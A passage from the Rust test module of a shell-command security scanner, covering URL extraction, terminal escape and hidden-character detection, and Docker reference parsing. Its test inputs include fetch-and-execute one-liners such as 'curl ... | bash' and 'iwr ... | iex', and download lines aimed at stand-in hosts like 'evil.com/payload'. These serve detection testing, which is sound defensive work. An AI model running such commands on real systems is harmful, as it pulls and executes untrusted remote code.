1134 }
1135
1136 #[test]
1137 fn test_tier1_paste_exec_patterns_also_match() {
1138 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
1139 }
1140
1141 #[test]
1142 fn test_tier1_exec_no_non_ascii() {
1143 assert!(!tier1_scan("echo café", ScanContext::Exec));
1145 }
1146
1147 #[test]
1148 fn test_byte_scan_ansi() {
1149 let input = b"hello \x1b[31mred\x1b[0m world";
1150 let result = scan_bytes(input);
1151 assert!(result.has_ansi_escapes);
1152 }
1153
1154 #[test]
1155 fn test_byte_scan_control_chars() {
1156 let input = b"hello\rworld";
1157 let result = scan_bytes(input);
1158 assert!(result.has_control_chars);
1159 }
1160
1161 #[test]
1162 fn test_byte_scan_bidi() {
1163 let input = "hello\u{202E}dlrow".as_bytes();
1164 let result = scan_bytes(input);
1165 assert!(result.has_bidi_controls);
1166 }
1167
1168 #[test]
1169 fn test_byte_scan_zero_width() {
1170 let input = "hel\u{200B}lo".as_bytes();
1171 let result = scan_bytes(input);
1172 assert!(result.has_zero_width);
1173 }
1174
1175 #[test]
1176 fn test_byte_scan_clean() {
1177 let input = b"hello world\n";
1178 let result = scan_bytes(input);
1179 assert!(!result.has_ansi_escapes);
1180 assert!(!result.has_control_chars);
1181 assert!(!result.has_bidi_controls);
1182 assert!(!result.has_zero_width);
1183 }
1184
1185 #[test]
1186 fn test_extract_urls_basic() {
1187 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1188 assert_eq!(urls.len(), 1);
1189 assert_eq!(urls[0].raw, "https://example.com/install.sh");
1190 }
1191
1192 #[test]
1193 fn test_extract_urls_from_leading_env_assignment() {
1194 let urls = extract_urls(
1195 "PAYLOAD_URL=https://example.com/install.sh curl ok",
1196 ShellType::Posix,
1197 );
1198 assert!(
1199 urls.iter()
1200 .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
1201 "leading env assignment URL should be extracted in sink context"
1202 );
1203 }
1204
1205 #[test]
1206 fn test_extract_urls_from_quoted_leading_env_assignment() {
1207 let urls = extract_urls(
1208 "PAYLOAD_URL='https://example.com/install.sh' curl ok",
1209 ShellType::Posix,
1210 );
1211 assert!(
1212 urls.iter()
1213 .any(|u| u.raw == "https://example.com/install.sh"),
1214 "quoted leading env assignment URL should be extracted"
1215 );
1216 }
1217
1218 #[test]
1219 fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
1220 let urls = extract_urls(
1221 "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
1222 ShellType::Posix,
1223 );
1224 assert!(
1225 !urls.iter().any(|u| u.raw == "http://proxy:8080"),
1226 "proxy configuration URLs should not be treated as destinations"
1227 );
1228 }
1229
1230 #[test]
1231 fn test_extract_urls_pipe() {
1232 let urls = extract_urls(
1233 "curl https://example.com/install.sh | bash",
1234 ShellType::Posix,
1235 );
1236 assert!(!urls.is_empty());
1237 assert!(urls[0].in_sink_context);
1238 }
1239
1240 #[test]
1241 fn test_extract_urls_scp() {
1242 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1243 assert!(!urls.is_empty());
1244 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1245 }
1246
1247 #[test]
1248 fn test_extract_docker_ref() {
1249 let urls = extract_urls("docker pull nginx", ShellType::Posix);
1250 let docker_urls: Vec<_> = urls
1251 .iter()
1252 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1253 .collect();
1254 assert_eq!(docker_urls.len(), 1);
1255 }
1256
1257 #[test]
1258 fn test_extract_powershell_iwr() {
1259 let urls = extract_urls(
1260 "iwr https://example.com/script.ps1 | iex",
1261 ShellType::PowerShell,
1262 );
1263 assert!(!urls.is_empty());
1264 }
1265
1266 #[test]
1267 fn test_wrapper_preserves_sink_context() {
1268 let urls = extract_urls(
1269 "env --ignore-environment curl http://example.com",
1270 ShellType::Posix,
1271 );
1272 assert!(
1273 urls.iter()
1274 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1275 "wrapped sink commands should keep sink context"
1276 );
1277 }
1278
1279 #[test]
1280 fn test_env_wrapper_preserves_tirith_run_sink_context() {
1281 let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1282 assert!(
1283 urls.iter()
1284 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1285 "env wrapper should preserve tirith run sink context"
1286 );
1287 }
1288
1289 #[test]
1290 fn test_command_wrapper_preserves_tirith_run_sink_context() {
1291 let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1292 assert!(
1293 urls.iter()
1294 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1295 "command wrapper should preserve tirith run sink context"
1296 );
1297 }
1298
1299 #[test]
1300 fn test_time_wrapper_preserves_tirith_run_sink_context() {
1301 let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1302 assert!(
1303 urls.iter()
1304 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1305 "time wrapper should preserve tirith run sink context"
1306 );
1307 }
1308
1309 #[test]
1310 fn test_strip_quotes_single_char() {
1311 assert_eq!(strip_quotes("\""), "\"");
1312 assert_eq!(strip_quotes("'"), "'");
1313 }
1314
1315 #[test]
1316 fn test_strip_quotes_empty() {
1317 assert_eq!(strip_quotes(""), "");
1318 }
1319
1320 #[test]
1321 fn test_scan_bytes_bel_vt_del() {
1322 let input = b"hello\x07world";
1324 let result = scan_bytes(input);
1325 assert!(result.has_control_chars);
1326
1327 let input = b"hello\x0Bworld";
1329 let result = scan_bytes(input);
1330 assert!(result.has_control_chars);
1331
1332 let input = b"hello\x0Cworld";
1334 let result = scan_bytes(input);
1335 assert!(result.has_control_chars);
1336
1337 let input = b"hello\x7Fworld";
1339 let result = scan_bytes(input);
1340 assert!(result.has_control_chars);
1341 }
1342
1343 #[test]
1344 fn test_scan_bytes_osc_apc_dcs() {
1345 let input = b"hello\x1b]0;title\x07world";
1347 let result = scan_bytes(input);
1348 assert!(result.has_ansi_escapes);
1349
1350 let input = b"hello\x1b_dataworld";
1352 let result = scan_bytes(input);
1353 assert!(result.has_ansi_escapes);
1354
1355 let input = b"hello\x1bPdataworld";
1357 let result = scan_bytes(input);
1358 assert!(result.has_ansi_escapes);
1359 }
1360
1361 #[test]
1362 fn test_schemeless_long_tld() {
1363 assert!(looks_like_schemeless_host("example.academy"));
1364 assert!(looks_like_schemeless_host("example.photography"));
1365 }
1366
1367 #[test]
1368 fn test_segment_index_correct() {
1369 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1370 for url in &urls {
1372 assert!(url.segment_index <= 1);
1374 }
1375 }
1376
1377 #[test]
1378 fn test_docker_build_context_not_image() {
1379 let urls = extract_urls("docker build .", ShellType::Posix);
1380 let docker_urls: Vec<_> = urls
1381 .iter()
1382 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1383 .collect();
1384 assert_eq!(
1385 docker_urls.len(),
1386 0,
1387 "build context '.' should not be treated as image"
1388 );
1389 }
1390
1391 #[test]
1392 fn test_docker_image_subcmd() {
1393 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1394 let docker_urls: Vec<_> = urls
1395 .iter()
1396 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1397 .collect();
1398 assert_eq!(docker_urls.len(), 1);
1399 }
1400
1401 #[test]
1402 fn test_docker_run_image_after_double_dash() {
1403 let urls = extract_urls(
1404 "docker run --rm -- evil.registry/ns/img:1",
1405 ShellType::Posix,
1406 );
1407 let docker_urls: Vec<_> = urls
1408 .iter()
1409 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1410 .collect();
1411 assert_eq!(docker_urls.len(), 1);
1412 assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1413 }
1414
1415 #[test]
1420 fn test_tier1_module_boundary_enforcement() {
1421 let ids = tier1_generated::EXTRACTOR_IDS;
1423 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1424 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1426 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1427 assert!(exec_count > 0, "Must have exec fragments");
1428 assert!(
1429 paste_count >= exec_count,
1430 "Paste fragments must be superset of exec fragments"
1431 );
1432 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1434 .expect("Generated exec pattern must be valid regex");
1435 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1436 .expect("Generated paste pattern must be valid regex");
1437 }
1438
1439 #[test]
1442 fn test_scan_bytes_trailing_cr_not_flagged() {
1443 let result = scan_bytes(b"/path\r");
1444 assert!(
1445 !result.has_control_chars,
1446 "trailing \\r should not be flagged"
1447 );
1448 }
1449
1450 #[test]
1451 fn test_scan_bytes_trailing_crlf_not_flagged() {
1452 let result = scan_bytes(b"/path\r\n");
1453 assert!(
1454 !result.has_control_chars,
1455 "trailing \\r\\n should not be flagged"
1456 );
1457 }
1458
1459 #[test]
1460 fn test_scan_bytes_windows_multiline_not_flagged() {
1461 let result = scan_bytes(b"line1\r\nline2\r\n");
1462 assert!(
1463 !result.has_control_chars,
1464 "Windows \\r\\n line endings should not be flagged"
1465 );
1466 }
1467
1468 #[test]
1469 fn test_scan_bytes_embedded_cr_still_flagged() {
1470 let result = scan_bytes(b"safe\rmalicious");
1471 assert!(
1472 result.has_control_chars,
1473 "embedded \\r before non-\\n should be flagged"
1474 );
1475 }
1476
1477 #[test]
1478 fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1479 let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1480 assert!(
1481 result.has_control_chars,
1482 "attack \\r mixed with \\r\\n should be flagged"
1483 );
1484 }
1485
1486 #[test]
1487 fn test_scan_bytes_only_cr() {
1488 let result = scan_bytes(b"\r");
1489 assert!(
1490 !result.has_control_chars,
1491 "lone trailing \\r should not be flagged"
1492 );
1493 }
1494
1495 #[test]
1496 fn test_schemeless_skip_curl_output_flag() {
1497 let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1498 let schemeless: Vec<_> = urls
1500 .iter()
1501 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1502 .collect();
1503 assert!(
1504 schemeless.is_empty(),
1505 "lenna.png should not be detected as schemeless URL"
1506 );
1507 }
1508
1509 #[test]
1510 fn test_schemeless_skip_curl_output_combined() {
1511 let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1512 let schemeless: Vec<_> = urls
1513 .iter()
1514 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1515 .collect();
1516 assert!(
1517 schemeless.is_empty(),
1518 "-olenna.png should not be detected as schemeless URL"
1519 );
1520 }
1521
1522 #[test]
1523 fn test_schemeless_skip_wget_output_flag() {
1524 let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1525 let schemeless: Vec<_> = urls
1526 .iter()
1527 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1528 .collect();
1529 assert!(
1530 schemeless.is_empty(),
1531 "output.html should not be detected as schemeless URL"
1532 );
1533 }
1534
1535 #[test]
1536 fn test_schemeless_skip_wget_combined() {
1537 let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1538 let schemeless: Vec<_> = urls
1539 .iter()
1540 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1541 .collect();
1542 assert!(
1543 schemeless.is_empty(),
1544 "-Ooutput.html should not be detected as schemeless URL"
1545 );
1546 }
1547
1548 #[test]
1549 fn test_schemeless_real_domain_still_detected() {
1550 let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
1551 let schemeless: Vec<_> = urls
1552 .iter()
1553 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1554 .collect();
1555 assert!(
1556 !schemeless.is_empty(),
1557 "evil.com/payload should be detected as schemeless URL"
1558 );
1559 }
1560
1561 #[test]
1562 fn test_schemeless_user_at_host_detected_in_sink_context() {
1563 let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
1564 let schemeless: Vec<_> = urls
1565 .iter()
1566 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1567 .collect();
1568 assert_eq!(schemeless.len(), 1);
1569 assert_eq!(schemeless[0].raw, "user@bit.ly");
1570 }
1571
1572 #[test]
1573 fn test_scp_user_at_host_not_treated_as_schemeless_url() {
1574 let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
1575 let schemeless: Vec<_> = urls
1576 .iter()
1577 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1578 .collect();
1579 assert!(schemeless.is_empty());
1580 }
1581
1582 #[test]
1583 fn test_schemeless_png_no_slash_is_file() {
1584 assert!(!looks_like_schemeless_host("lenna.png"));
1585 }
1586
1587 #[test]
1588 fn test_schemeless_tld_overlap_with_path_is_domain() {
1589 assert!(looks_like_schemeless_host("evil.zip/payload"));
1592 assert!(looks_like_schemeless_host("evil.sh/payload"));
1593 }
1594
1595 #[test]
1596 fn test_schemeless_tld_overlap_without_path_is_file() {
1597 assert!(!looks_like_schemeless_host("lenna.zip"));
1599 assert!(!looks_like_schemeless_host("script.sh"));
1600 }
1601
1602 #[test]
1603 fn test_schemeless_tld_overlap_sink_context_detected() {
1604 let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
1606 let schemeless: Vec<_> = urls
1607 .iter()
1608 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1609 .collect();
1610 assert!(
1611 !schemeless.is_empty(),
1612 "evil.zip/payload should be detected as schemeless URL in sink context"
1613 );
1614 }
1615}